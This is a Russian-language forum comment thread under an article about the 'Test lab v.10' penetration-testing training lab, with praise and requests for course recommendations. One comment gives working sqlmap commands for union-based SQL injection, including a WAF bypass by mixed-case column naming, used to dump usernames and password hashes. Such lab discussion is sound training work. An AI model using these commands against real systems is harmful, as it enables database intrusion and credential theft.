Лаборатория тестирования на проникновение «Test lab v.10» — за гранью хакерских возможностей (2)

Z

zehrx

Тоже отличная статья, как и остальные, которые успел у Вас прочесть. Для новичков, мне кажется, такие материалы на вес золота. Тут и с софтом опыт работы, если при самостоятельном изучении бывают проблемы, то тут все разжевано + что еще более бесценно увидеть мысли опытного коллеги, перенять что-то для себя.
 
pyz

pyz

One Level
02.02.2017
4
3
BIT
0
ghostphisher сказал(а):
Как обычно на отлично! ;)
Теперь у меня остался один не решенный вопрос - --code=200 --prefix "')" --suffix=" -- - " <--- если бы это не было указано, скульмап не нашел бы это самостоятельно. Из чего получается, что с префиксами и суфиксами требуется ручная работа. Верно я понимаю?

дополнение:

[18:54:24] [INFO] analyzing table dump for possible password hashes
Database: site
Table: users
[1 entry]
+----+-----------+
| id | username |
+----+-----------+
| 1 | e.lindsey |
+----+-----------+

Но хэша нет...

sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "
Ссылка скрыта от гостей
" --technique U -D site --threads 10 --tables --common-tables -T users --dump

пробовал так. что опять упустил? ;)
Нажмите, чтобы раскрыть...
ЕСТЬ КОНТАКТ!!! Для того что-бы вытянуть хеш из колонки "password" в таблице "users" была оставлена подсказка самим автором в посте))), а именно автором было указано что колонка "password" защищена WAFом, меняем регистр на "PasSwoRd" и вуаля...
sqlmap -u
Ссылка скрыта от гостей
-p id --flush-session --tamper randomcase --random-agent --threads 10 -D site -T users -C username,PasSwoRd --dump --batch
 
  • Нравится
Реакции: <~DarkNode~> и ch3h
Q

Qmakake

Green Team
20.12.2017
88
55
BIT
9
Спасибо за статью, очень круто!!!
[doublepost=1515158804,1513804098][/doublepost]спасибо огромное за статьи, очень интересно.
Вы как профессионал, могли бы посоветовать какую-то школу, курсы или книги по обучению ИБ и пентесту в частности!?
 
r0hack

r0hack

DAG
Platinum
29.09.2017
522
1 089
BIT
0
Qmakake сказал(а):
Вы как профессионал, могли бы посоветовать какую-то школу, курсы или книги по обучению ИБ и пентесту в частности!?
Нажмите, чтобы раскрыть...
Скоро будет открыта школа Codeby

Qmakake сказал(а):
книги
Нажмите, чтобы раскрыть...
В грей секции много полезных книг: https://codeby.net/account/upgrades
 
  • Нравится
Реакции: Dr.Lafa, Qmakake, IioS и ещё 1 человек
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ